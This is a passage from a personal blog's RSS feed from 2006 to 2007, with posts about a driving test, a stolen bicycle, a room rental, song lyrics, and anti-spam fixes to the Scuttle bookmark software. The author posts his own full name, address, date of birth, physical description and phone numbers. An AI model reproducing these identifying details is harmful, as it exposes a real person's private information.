  7469. ANDREAS RENE JAGGI                       SEX:M   HAIR:BRN   EYES:HZL
  7470. 900 ISLAND DR STE 101                    HT:5-11   WT:187   DOB:01-22-84
  7471. REDWOOD CITY   CA  94065
  7472.  
  7473.  
  7474.  THIS LICENSE IS ISSUED AS A LICENSE TO DRIVE A MOTOR VEHICLE;
  7475.     IT DOES NOT ESTABLISH ELIGIBILITY FOR EMPLOYMENT, VOTER
  7476.                REGISTRATION, OR PUBLIC BENEFITS.
  7477. </pre>
  7478. <p>Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the "parallel parking" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.</p>
  7479. ]]></description>
  7480.    <content:encoded><![CDATA[<p>I passed the California driving test this afternoon, now the streets are no longer safe :-)<br>The interim driver license looks really shabby, it's just this text printed on cheap copier paper:</p>
  7481. <pre>
  7482.                        INTERIM DRIVER LICENSE
  7483.  
  7484.                  DXXXXXXX        CLASS C
  7485.  
  7486.  
  7487.            ISSUED:07-25-07   XXX   XX/XX   EXPIRES:09-22-07
  7488.  
  7489. ANDREAS RENE JAGGI                       SEX:M   HAIR:BRN   EYES:HZL
  7490. 900 ISLAND DR STE 101                    HT:5-11   WT:187   DOB:01-22-84
  7491. REDWOOD CITY   CA  94065
  7492.  
  7493.  
  7494.  THIS LICENSE IS ISSUED AS A LICENSE TO DRIVE A MOTOR VEHICLE;
  7495.     IT DOES NOT ESTABLISH ELIGIBILITY FOR EMPLOYMENT, VOTER
  7496.                REGISTRATION, OR PUBLIC BENEFITS.
  7497. </pre>
  7498. <p>Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the "parallel parking" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.</p>
  7499. ]]></content:encoded>
  7500.  </item>
  7501.  
  7502.  <item>
  7503.    <title>Bicycle stolen!</title>
  7504.    <link>https://blog.x-way.org/Misc/2007/07/22/Bicycle-stolen.html</link>
  7505.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324102</guid>
  7506.    <dc:creator>Andreas Jaggi</dc:creator>
  7507.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7508.    <pubDate>Sun, 22 Jul 2007 22:08:40 +0000</pubDate>
  7509.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7510.    <description><![CDATA[<p>This afternoon some asshole has stolen my bicycle.<br>I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(</p>
  7511. <p>Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.<br>So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.</p>
  7512.  
  7513. <table>
  7514. <tr><td>Serial#</td>
  7515. <td><strong>IDC07B22590</strong></td></tr>
  7516. <tr><td>Brand</td>
  7517. <td><strong>GT</strong></td></tr>
  7518. <tr><td>Model</td>
  7519. <td><strong>Avalanche 3.0 (2007)</strong></td></tr>
  7520. <tr><td>Color</td>
  7521. <td><strong>black</strong></td></tr>
  7522. <tr><td>Size</td>
  7523. <td><strong>XL</strong></td></tr>
  7524. </table>
  7525.  
  7526. <p><a href="https://blog.x-way.org/images/stolen-gt-avalanche.jpg"><img src="https://blog.x-way.org/images/stolen-gt-avalanche_thumb.jpg" alt="Stolen GT Avalanche 3.0 2006 - owner 650.888.0140"></a></p>
  7527. ]]></description>
  7528.    <content:encoded><![CDATA[<p>This afternoon some asshole has stolen my bicycle.<br>I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(</p>
  7529. <p>Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.<br>So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.</p>
  7530.  
  7531. <table>
  7532. <tr><td>Serial#</td>
  7533. <td><strong>IDC07B22590</strong></td></tr>
  7534. <tr><td>Brand</td>
  7535. <td><strong>GT</strong></td></tr>
  7536. <tr><td>Model</td>
  7537. <td><strong>Avalanche 3.0 (2007)</strong></td></tr>
  7538. <tr><td>Color</td>
  7539. <td><strong>black</strong></td></tr>
  7540. <tr><td>Size</td>
  7541. <td><strong>XL</strong></td></tr>
  7542. </table>
  7543.  
  7544. <p><a href="https://blog.x-way.org/images/stolen-gt-avalanche.jpg"><img src="https://blog.x-way.org/images/stolen-gt-avalanche_thumb.jpg" alt="Stolen GT Avalanche 3.0 2006 - owner 650.888.0140"></a></p>
  7545. ]]></content:encoded>
  7546.  </item>
  7547.  
  7548.  <item>
  7549.    <title>Kuriose Fakten über mich</title>
  7550.    <link>https://blog.x-way.org/Misc/2007/02/10/Kuriose-Fakten-ueber-mich.html</link>
  7551.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324101</guid>
  7552.    <dc:creator>Andreas Jaggi</dc:creator>
  7553.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7554.    <pubDate>Sat, 10 Feb 2007 00:25:52 +0000</pubDate>
  7555.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7556.    <description><![CDATA[<p><a href="https://web.archive.org/web/20070213223032/http://blog.robwei.de/rwo2k5/286-(Fakten,_Fakten,_Fakten)%C2%B2/">Robert</a> will zum Wochenende noch ein paar Fakten sehen:</p>
  7557.  
  7558. <ol>
  7559.  
  7560. <li>Ich hasse Arbeiten Schreiben, Lernen, etc. aber trotzdem sitze ich seit 15&#189; Jahren hinter der Schulbank (und bin damit noch immer nicht fertig).</li>
  7561.  
  7562. <li>Im nächsten Semester gehe ich endlich mal nicht zur Schule sondern <del>mache Ferien in Kalifornien</del> programmiere bei <a href="https://web.archive.org/web/20070225100617/http://www.novawavetech.com/">Novawave Technologies</a> an Embedded Linux Geräten herum.</li>
  7563.  
  7564. <li>Je mehr ich neben dem Studium mache, desto besser werden meine Noten.</li>
  7565.  
  7566. <li>Vor langer Zeit habe ich einmal Schlagzeug gespielt.</li>
  7567.  
  7568. <li>Vor noch längerer Zeit sogar Blockflöte.</li>
  7569.  
  7570. <li>Zwei mal pro Woche fahre ich über <a href="http://www.goldenpass.ch/">eine der schönsten Bahnstrecken</a> und dabei schlafe ich oder starre in meinen Laptop.</li>
  7571.  
  7572. <li>Ich interessiere mich für Eventtechnik und nicht zu wenig (<a href="http://satellite.epfl.ch/">Satellite</a>,
  7573. <a href="http://balelec.ch/">Bal&#233;lec</a>,
  7574. Challenge 06,
  7575. <a href="http://artiphys.epfl.ch/">Artiphys</a>,
  7576. <a href="http://vivapoly.epfl.ch/">Vivapoly</a>,
  7577. <a href="https://web.archive.org/web/20040729134938/http://www.closedair.ch/">ClosedAir 06</a>,
  7578. <a href="https://web.archive.org/web/20060803102823/http://polybeach.ch/">Polybeach</a>,
  7579. <a href="http://agepoly.epfl.ch/PIP/">PIP</a>).</li>
  7580. </ol>
  7581.  
  7582. <p>Mal schauen ob <a href="#" class="gone">Andreas</a> oder <a href="https://web.archive.org/web/20070304175435/http://blog.boltzmann-konstante.de/">Gordon</a> was über sich erzählen wollen.</p>
  7583.  
  7584. ]]></description>
  7585.    <content:encoded><![CDATA[<p><a href="https://web.archive.org/web/20070213223032/http://blog.robwei.de/rwo2k5/286-(Fakten,_Fakten,_Fakten)%C2%B2/">Robert</a> will zum Wochenende noch ein paar Fakten sehen:</p>
  7586.  
  7587. <ol>
  7588.  
  7589. <li>Ich hasse Arbeiten Schreiben, Lernen, etc. aber trotzdem sitze ich seit 15&#189; Jahren hinter der Schulbank (und bin damit noch immer nicht fertig).</li>
  7590.  
  7591. <li>Im nächsten Semester gehe ich endlich mal nicht zur Schule sondern <del>mache Ferien in Kalifornien</del> programmiere bei <a href="https://web.archive.org/web/20070225100617/http://www.novawavetech.com/">Novawave Technologies</a> an Embedded Linux Geräten herum.</li>
  7592.  
  7593. <li>Je mehr ich neben dem Studium mache, desto besser werden meine Noten.</li>
  7594.  
  7595. <li>Vor langer Zeit habe ich einmal Schlagzeug gespielt.</li>
  7596.  
  7597. <li>Vor noch längerer Zeit sogar Blockflöte.</li>
  7598.  
  7599. <li>Zwei mal pro Woche fahre ich über <a href="http://www.goldenpass.ch/">eine der schönsten Bahnstrecken</a> und dabei schlafe ich oder starre in meinen Laptop.</li>
  7600.  
  7601. <li>Ich interessiere mich für Eventtechnik und nicht zu wenig (<a href="http://satellite.epfl.ch/">Satellite</a>,
  7602. <a href="http://balelec.ch/">Bal&#233;lec</a>,
  7603. Challenge 06,
  7604. <a href="http://artiphys.epfl.ch/">Artiphys</a>,
  7605. <a href="http://vivapoly.epfl.ch/">Vivapoly</a>,
  7606. <a href="https://web.archive.org/web/20040729134938/http://www.closedair.ch/">ClosedAir 06</a>,
  7607. <a href="https://web.archive.org/web/20060803102823/http://polybeach.ch/">Polybeach</a>,
  7608. <a href="http://agepoly.epfl.ch/PIP/">PIP</a>).</li>
  7609. </ol>
  7610.  
  7611. <p>Mal schauen ob <a href="#" class="gone">Andreas</a> oder <a href="https://web.archive.org/web/20070304175435/http://blog.boltzmann-konstante.de/">Gordon</a> was über sich erzählen wollen.</p>
  7612.  
  7613. ]]></content:encoded>
  7614.  </item>
  7615.  
  7616.  <item>
  7617.    <title>Jamendo rocks!</title>
  7618.    <link>https://blog.x-way.org/Music/2007/02/09/Jamendo-rocks.html</link>
  7619.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324100</guid>
  7620.    <dc:creator>Andreas Jaggi</dc:creator>
  7621.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7622.    <pubDate>Fri, 09 Feb 2007 09:04:19 +0000</pubDate>
  7623.    <category domain="https://blog.x-way.org/Music">Music</category>
  7624.    <description><![CDATA[<p><a href="https://www.jamendo.com/playlist/8122/francais" title="My Jamendo playlist with french rock music">Jamendo playlist</a></p>
  7625. ]]></description>
  7626.    <content:encoded><![CDATA[<p><a href="https://www.jamendo.com/playlist/8122/francais" title="My Jamendo playlist with french rock music">Jamendo playlist</a></p>
  7627. ]]></content:encoded>
  7628.  </item>
  7629.  
  7630.  <item>
  7631.    <title>Chambre à louer à Vufflens-la-ville</title>
  7632.    <link>https://blog.x-way.org/Misc/2007/02/03/Chambre-a-louer-a-Vufflens-la-ville.html</link>
  7633.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324099</guid>
  7634.    <dc:creator>Andreas Jaggi</dc:creator>
  7635.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7636.    <pubDate>Sat, 03 Feb 2007 18:48:08 +0000</pubDate>
  7637.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7638.    <description><![CDATA[<p>A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), &#224; louer du 10 mars au 15 septembre 2007 une chambre meubl&#233;e ind&#233;pendante de 32 m<sup>2</sup> avec coin cuisine et ADSL, situ&#233;e dans une ancienne ferme habit&#233;e par une famille (salle d'eau en commun, possibilit&#233; d'utiliser le jardin), pour 530 francs par mois, charges comprises.<br>
  7639. T&#233;l. de pr&#233;f&#233;rence le soir au 021'701'14'61 ou au 078'645'56'83.</p>
  7640.  
  7641. <p><a href="https://blog.x-way.org/images/chambrealouer1.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer1_thumb.jpg" alt="chambre"></a></p>
  7642. <p><a href="https://blog.x-way.org/images/chambrealouer2.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer2_thumb.jpg" alt="Jardin"></a></p>
  7643. <p><a href="https://blog.x-way.org/images/chambrealouer3.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer3_thumb.jpg" alt="Jardin"></a></p>
  7644.  
  7645. ]]></description>
  7646.    <content:encoded><![CDATA[<p>A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), &#224; louer du 10 mars au 15 septembre 2007 une chambre meubl&#233;e ind&#233;pendante de 32 m<sup>2</sup> avec coin cuisine et ADSL, situ&#233;e dans une ancienne ferme habit&#233;e par une famille (salle d'eau en commun, possibilit&#233; d'utiliser le jardin), pour 530 francs par mois, charges comprises.<br>
  7647. T&#233;l. de pr&#233;f&#233;rence le soir au 021'701'14'61 ou au 078'645'56'83.</p>
  7648.  
  7649. <p><a href="https://blog.x-way.org/images/chambrealouer1.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer1_thumb.jpg" alt="chambre"></a></p>
  7650. <p><a href="https://blog.x-way.org/images/chambrealouer2.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer2_thumb.jpg" alt="Jardin"></a></p>
  7651. <p><a href="https://blog.x-way.org/images/chambrealouer3.jpg"><img width="300" height="225" style="border:0;" src="https://blog.x-way.org/images/chambrealouer3_thumb.jpg" alt="Jardin"></a></p>
  7652.  
  7653. ]]></content:encoded>
  7654.  </item>
  7655.  
  7656.  <item>
  7657.    <title>Des jours sans rien</title>
  7658.    <link>https://blog.x-way.org/Music/2006/09/17/Des-jours-sans-rien.html</link>
  7659.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324098</guid>
  7660.    <dc:creator>Andreas Jaggi</dc:creator>
  7661.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7662.    <pubDate>Sun, 17 Sep 2006 13:32:25 +0000</pubDate>
  7663.    <category domain="https://blog.x-way.org/Music">Music</category>
  7664.    <description><![CDATA[<p>Je me rapelle ces cellules vides<br>
  7665. Tout petits bouts de vie sordides<br>
  7666. Je passe ma journ&#233;e &#224; attendre<br>
  7667. Que quelqu'un tente de la comprendre<br>
  7668. Il vaut mieux apprendre &#224; mentir<br>
  7669. Se supporter tant mal que pire<br>
  7670. Mieux vaut apprendre &#224; oublier<br>
  7671. Que tous les jours faut se lever<br>
  7672. Trouver la force d'y croire encore<br>
  7673. Quand tout notre corps hurle &quot;assez&quot;<br>
  7674. Sourire &#224; des gens inconnus<br>
  7675. Quand ceux qu'on aime ne sourient plus<br>
  7676. Dans la galerie de nos amours perdues<br>
  7677. Se souvenir que l'on n'est rien<br>
  7678. Qu'un paranth&#232;se dans le destin<br>
  7679. Sous-particule du genre humain<br>
  7680. Et ces journ&#233;es sont toutes les m&#234;mes<br>
  7681. Avec nos peurs et nos &quot;je t'aime&quot;<br>
  7682. Avec cette solitude am&#232;re<br>
  7683. On vit &#8211; on meurt et on esp&#232;re<br>
  7684. Une derni&#232;re lettre abandon&#233;e<br>
  7685. Du rouge &#224; l&#232;vres sur un caf&#233;<br>
  7686. N'importe quoi pour oublier<br>
  7687. Que tous les jours faut se lever&#8230;</p>
  7688.  
  7689. <p>(Glardon/<a href="https://web.archive.org/web/20081226085307/http://www.melatonin.cd/" title="Melatonin musique (archive.org)">Melatonin</a>)</p>
  7690.  
  7691.  
  7692. <p>Cette chanson d&#233;crit pas mal les trois semaines que je viens de passer &#224; l'arm&#233;e<br>
  7693. </p>
  7694.  
  7695. ]]></description>
  7696.    <content:encoded><![CDATA[<p>Je me rapelle ces cellules vides<br>
  7697. Tout petits bouts de vie sordides<br>
  7698. Je passe ma journ&#233;e &#224; attendre<br>
  7699. Que quelqu'un tente de la comprendre<br>
  7700. Il vaut mieux apprendre &#224; mentir<br>
  7701. Se supporter tant mal que pire<br>
  7702. Mieux vaut apprendre &#224; oublier<br>
  7703. Que tous les jours faut se lever<br>
  7704. Trouver la force d'y croire encore<br>
  7705. Quand tout notre corps hurle &quot;assez&quot;<br>
  7706. Sourire &#224; des gens inconnus<br>
  7707. Quand ceux qu'on aime ne sourient plus<br>
  7708. Dans la galerie de nos amours perdues<br>
  7709. Se souvenir que l'on n'est rien<br>
  7710. Qu'un paranth&#232;se dans le destin<br>
  7711. Sous-particule du genre humain<br>
  7712. Et ces journ&#233;es sont toutes les m&#234;mes<br>
  7713. Avec nos peurs et nos &quot;je t'aime&quot;<br>
  7714. Avec cette solitude am&#232;re<br>
  7715. On vit &#8211; on meurt et on esp&#232;re<br>
  7716. Une derni&#232;re lettre abandon&#233;e<br>
  7717. Du rouge &#224; l&#232;vres sur un caf&#233;<br>
  7718. N'importe quoi pour oublier<br>
  7719. Que tous les jours faut se lever&#8230;</p>
  7720.  
  7721. <p>(Glardon/<a href="https://web.archive.org/web/20081226085307/http://www.melatonin.cd/" title="Melatonin musique (archive.org)">Melatonin</a>)</p>
  7722.  
  7723.  
  7724. <p>Cette chanson d&#233;crit pas mal les trois semaines que je viens de passer &#224; l'arm&#233;e<br>
  7725. </p>
  7726.  
  7727. ]]></content:encoded>
  7728.  </item>
  7729.  
  7730.  <item>
  7731.    <title>Samstag ist Patchtag</title>
  7732.    <link>https://blog.x-way.org/Coding/2006/08/19/Samstag-ist-Patchtag.html</link>
  7733.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324097</guid>
  7734.    <dc:creator>Andreas Jaggi</dc:creator>
  7735.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7736.    <pubDate>Sat, 19 Aug 2006 15:04:57 +0000</pubDate>
  7737.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  7738.    <description><![CDATA[<p>Heute jedenfalls: um meine <a href="http://links.x-way.org">Linksammlung</a> in Zukunft besser vor Spammern zu schützen, habe ich <a href="https://github.com/scronide/scuttle">Scuttle</a> ein bisschen erweitert:</p>
  7739.  
  7740. <ul>
  7741. <li>Zuerst wurde eine E-Mail-Benachrichtigung eingebaut, wenn sich ein neuer User registriert. So können Spammer nicht mehr tagelang unbemerkt ihr Unwesen treiben. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-email-notification.diff">scuttle-email-notification.diff</a></li>
  7742.  
  7743. <li>Dann habe ich einen Filter eingebaut, damit sich Spammer nicht mehr mit freexxx, pornlinks oder texaspoker registrieren können. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-reasonableusernames.diff">scuttle-reasonableusernames.diff</a></li>
  7744.  
  7745. <li>Und zum Schluss gibt's noch einen Adminbereich wo Spammer bequem ausgewählt und mitsammt ihrer Links und Tags gelöscht werden können. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-admin.diff">scuttle-admin.diff</a></li>
  7746. </ul>
  7747. <p>Um den Adminbereich nutzen zu können muss in der Datenbank noch ein Feld <code>uAdmin</code> vom Typ <code>TINYINT(1)</code> zur Tabelle <code>sc_users</code> hinzugefügt werden. Danach dieses einfach auf <code>1</code> setzen um einen Benutzer zum Administrator zu machen.</p>
  7748.  
  7749. ]]></description>
  7750.    <content:encoded><![CDATA[<p>Heute jedenfalls: um meine <a href="http://links.x-way.org">Linksammlung</a> in Zukunft besser vor Spammern zu schützen, habe ich <a href="https://github.com/scronide/scuttle">Scuttle</a> ein bisschen erweitert:</p>
  7751.  
  7752. <ul>
  7753. <li>Zuerst wurde eine E-Mail-Benachrichtigung eingebaut, wenn sich ein neuer User registriert. So können Spammer nicht mehr tagelang unbemerkt ihr Unwesen treiben. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-email-notification.diff">scuttle-email-notification.diff</a></li>
  7754.  
  7755. <li>Dann habe ich einen Filter eingebaut, damit sich Spammer nicht mehr mit freexxx, pornlinks oder texaspoker registrieren können. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-reasonableusernames.diff">scuttle-reasonableusernames.diff</a></li>
  7756.  
  7757. <li>Und zum Schluss gibt's noch einen Adminbereich wo Spammer bequem ausgewählt und mitsammt ihrer Links und Tags gelöscht werden können. &#8594;&nbsp;<a href="https://blog.x-way.org/stuff/scuttle-admin.diff">scuttle-admin.diff</a></li>
  7758. </ul>
  7759. <p>Um den Adminbereich nutzen zu können muss in der Datenbank noch ein Feld <code>uAdmin</code> vom Typ <code>TINYINT(1)</code> zur Tabelle <code>sc_users</code> hinzugefügt werden. Danach dieses einfach auf <code>1</code> setzen um einen Benutzer zum Administrator zu machen.</p>
  7760.  
  7761. ]]></content:encoded>
  7762.  </item>
  7763.  
  7764.  <item>
  7765.    <title>Setting up an SSL server with Apache2</title>
  7766.    <link>https://blog.x-way.org/Linux/2006/08/18/Setting-up-an-SSL-server-with-Apache2.html</link>
  7767.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324096</guid>
  7768.    <dc:creator>Andreas Jaggi</dc:creator>
  7769.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7770.    <pubDate>Fri, 18 Aug 2006 18:25:21 +0000</pubDate>
  7771.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  7772.    <description><![CDATA[<p>Thanks to <a href="http://www.debian-administration.org/articles/349" title="Debian Administration :: Setting up an SSL server with Apache2">this</a> (really simple) tutorial from <a href="http://debian-administration.org/" title="Debian Administration">debian-administration.org</a> I managed to enable SSL on my server. Thus <a href="https://links.x-way.org/" title="https://links.x-way.org/">links.x-way.org</a> is available via HTTPS.</p>
  7773. <p>
  7774. If you run a server without SSL, please take two minutes and enable it.<br>Your users will be thankfull for their protected privacy.</p>
  7775. ]]></description>
  7776.    <content:encoded><![CDATA[<p>Thanks to <a href="http://www.debian-administration.org/articles/349" title="Debian Administration :: Setting up an SSL server with Apache2">this</a> (really simple) tutorial from <a href="http://debian-administration.org/" title="Debian Administration">debian-administration.org</a> I managed to enable SSL on my server. Thus <a href="https://links.x-way.org/" title="https://links.x-way.org/">links.x-way.org</a> is available via HTTPS.</p>
  7777. <p>
  7778. If you run a server without SSL, please take two minutes and enable it.<br>Your users will be thankfull for their protected privacy.</p>
  7779. ]]></content:encoded>
  7780.  </item>
  7781.  
  7782.  <item>
  7783.    <title>Weg mit dem Spam</title>
  7784.    <link>https://blog.x-way.org/Misc/2006/08/17/Weg-mit-dem-Spam.html</link>
  7785.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324095</guid>
  7786.    <dc:creator>Andreas Jaggi</dc:creator>
  7787.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7788.    <pubDate>Thu, 17 Aug 2006 16:50:46 +0000</pubDate>
  7789.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7790.    <description><![CDATA[<p>Heute wurde meine mit <a href="https://github.com/scronide/scuttle" title="scuttle.org">Scuttle</a> funktionierende <a href="http://links.x-way.org/" title="links.x-way.org">Linksammlung</a> von einem Spammer heimgesucht.<br>
  7791. Resultat: rund 10'000 Spamlinks und etwa dreimal soviele Spamtags.</p>
  7792.  
  7793. <p>Glücklicherweise lässt sich das mit nur drei SQL Befehlen entfernen:</p>
  7794.  
  7795. <ol>
  7796. <li>
  7797. <p><var>spammer-uId</var> ausfindig machen und entsprechenden User löschen</p>
  7798. <code>DELET FROM sc_users WHERE uID = <var>spammer-uId</var></code></li>
  7799.  
  7800. <li>
  7801. <p>Spamtags löschen</p>
  7802. <code>
  7803. DELETE FROM sc_tags WHERE bId IN (SELECT bId FROM sc_bookmarks WHERE uId = <var>spammer-uId</var>)
  7804. </code>
  7805. </li>
  7806.  
  7807. <li>
  7808. <p>Spamlinks löschen</p>
  7809. <code> DELETE FROM sc_bookmarks WHERE uId = <var>spammer-uId</var></code>
  7810. </li>
  7811. </ol>
  7812. ]]></description>
  7813.    <content:encoded><![CDATA[<p>Heute wurde meine mit <a href="https://github.com/scronide/scuttle" title="scuttle.org">Scuttle</a> funktionierende <a href="http://links.x-way.org/" title="links.x-way.org">Linksammlung</a> von einem Spammer heimgesucht.<br>
  7814. Resultat: rund 10'000 Spamlinks und etwa dreimal soviele Spamtags.</p>
  7815.  
  7816. <p>Glücklicherweise lässt sich das mit nur drei SQL Befehlen entfernen:</p>
  7817.  
  7818. <ol>
  7819. <li>
  7820. <p><var>spammer-uId</var> ausfindig machen und entsprechenden User löschen</p>
  7821. <code>DELET FROM sc_users WHERE uID = <var>spammer-uId</var></code></li>
  7822.  
  7823. <li>
  7824. <p>Spamtags löschen</p>
  7825. <code>
  7826. DELETE FROM sc_tags WHERE bId IN (SELECT bId FROM sc_bookmarks WHERE uId = <var>spammer-uId</var>)
  7827. </code>
  7828. </li>
  7829.  
  7830. <li>
  7831. <p>Spamlinks löschen</p>
  7832. <code> DELETE FROM sc_bookmarks WHERE uId = <var>spammer-uId</var></code>
  7833. </li>
  7834. </ol>
  7835. ]]></content:encoded>
  7836.  </item>
  7837.  
  7838.  <item>
  7839.    <title>Bachelor</title>
  7840.    <link>https://blog.x-way.org/Misc/2006/08/16/Bachelor.html</link>
  7841.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324094</guid>
  7842.    <dc:creator>Andreas Jaggi</dc:creator>
  7843.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7844.    <pubDate>Wed, 16 Aug 2006 11:56:00 +0000</pubDate>
  7845.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7846.    <description><![CDATA[<blockquote><p>Vu ces r&#233;sultats, le Bachelor of Science BSc en informatique lui est d&#233;cern&#233;.<br>
  7847. In consideration of these results the candidate is awarded the &quot;Bachelor of Science BSc in Computer Science&quot;</p></blockquote>
  7848. ]]></description>
  7849.    <content:encoded><![CDATA[<blockquote><p>Vu ces r&#233;sultats, le Bachelor of Science BSc en informatique lui est d&#233;cern&#233;.<br>
  7850. In consideration of these results the candidate is awarded the &quot;Bachelor of Science BSc in Computer Science&quot;</p></blockquote>
  7851. ]]></content:encoded>
  7852.  </item>
  7853.  
  7854.  <item>
  7855.    <title>httphead.c</title>
  7856.    <link>https://blog.x-way.org/Coding/2006/08/13/httpheadc.html</link>
  7857.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324093</guid>
  7858.    <dc:creator>Andreas Jaggi</dc:creator>
  7859.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7860.    <pubDate>Sun, 13 Aug 2006 15:40:34 +0000</pubDate>
  7861.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  7862.    <description><![CDATA[<p>Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geübt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein <a href="https://www.epfl.ch/labs/lsir/teaching/completed-projects/programming-worlds-smallest-computer/" title="LSIR Project - Programming world's smallest computer ">Semesterprojekt</a> beginne.</p>
  7863. <p>Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: <a href="https://blog.x-way.org/stuff/httphead.c" title="httphead.c">httphead.c</a></p>
  7864. ]]></description>
  7865.    <content:encoded><![CDATA[<p>Da es mir gestern Abend etwas langweilig war, habe ich mich ein bisschen im C Programmieren geübt, schliesslich sollte ich darin fit sein wenn ich im Herbst mein <a href="https://www.epfl.ch/labs/lsir/teaching/completed-projects/programming-worlds-smallest-computer/" title="LSIR Project - Programming world's smallest computer ">Semesterprojekt</a> beginne.</p>
  7866. <p>Dabei ist ein kleines Programm entstanden, das den HTTP-Header einer Website ausgibt: <a href="https://blog.x-way.org/stuff/httphead.c" title="httphead.c">httphead.c</a></p>
  7867. ]]></content:encoded>
  7868.  </item>
  7869.  
  7870.  <item>
  7871.    <title>No more trackback (spam)</title>
  7872.    <link>https://blog.x-way.org/Misc/2006/08/13/No-more-trackback-spam.html</link>
  7873.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324092</guid>
  7874.    <dc:creator>Andreas Jaggi</dc:creator>
  7875.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7876.    <pubDate>Sun, 13 Aug 2006 15:20:21 +0000</pubDate>
  7877.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7878.    <description><![CDATA[<p>Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!<br>
  7879. Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stärker mit Trackback-Spam bombardiert werde und der schützende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.</p>
  7880. <p>Also gibt's ab jetzt hier keine Trackback-Unterstützung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!</p>
  7881. ]]></description>
  7882.    <content:encoded><![CDATA[<p>Gestern wurde mir mitgeteilt, dass mein trackback.php Script den Server zum Absturz gebracht hat!<br>
  7883. Das erstaunt mich nicht besonders, da ich hier in letzter Zeit immer stärker mit Trackback-Spam bombardiert werde und der schützende Bayesian Spam-Filter nicht gerade sehr ressourcenschonend arbeitet.</p>
  7884. <p>Also gibt's ab jetzt hier keine Trackback-Unterstützung mehr. Aufrufe von trackback.php werden mit 410 oder 403 beantwortet!</p>
  7885. ]]></content:encoded>
  7886.  </item>
  7887.  
  7888.  <item>
  7889.    <title>Länder Stöckchen</title>
  7890.    <link>https://blog.x-way.org/Misc/2006/07/02/Laender-Stoeckchen.html</link>
  7891.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324091</guid>
  7892.    <dc:creator>Andreas Jaggi</dc:creator>
  7893.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7894.    <pubDate>Sun, 02 Jul 2006 16:57:54 +0000</pubDate>
  7895.    <category domain="https://blog.x-way.org/Misc">Misc</category>
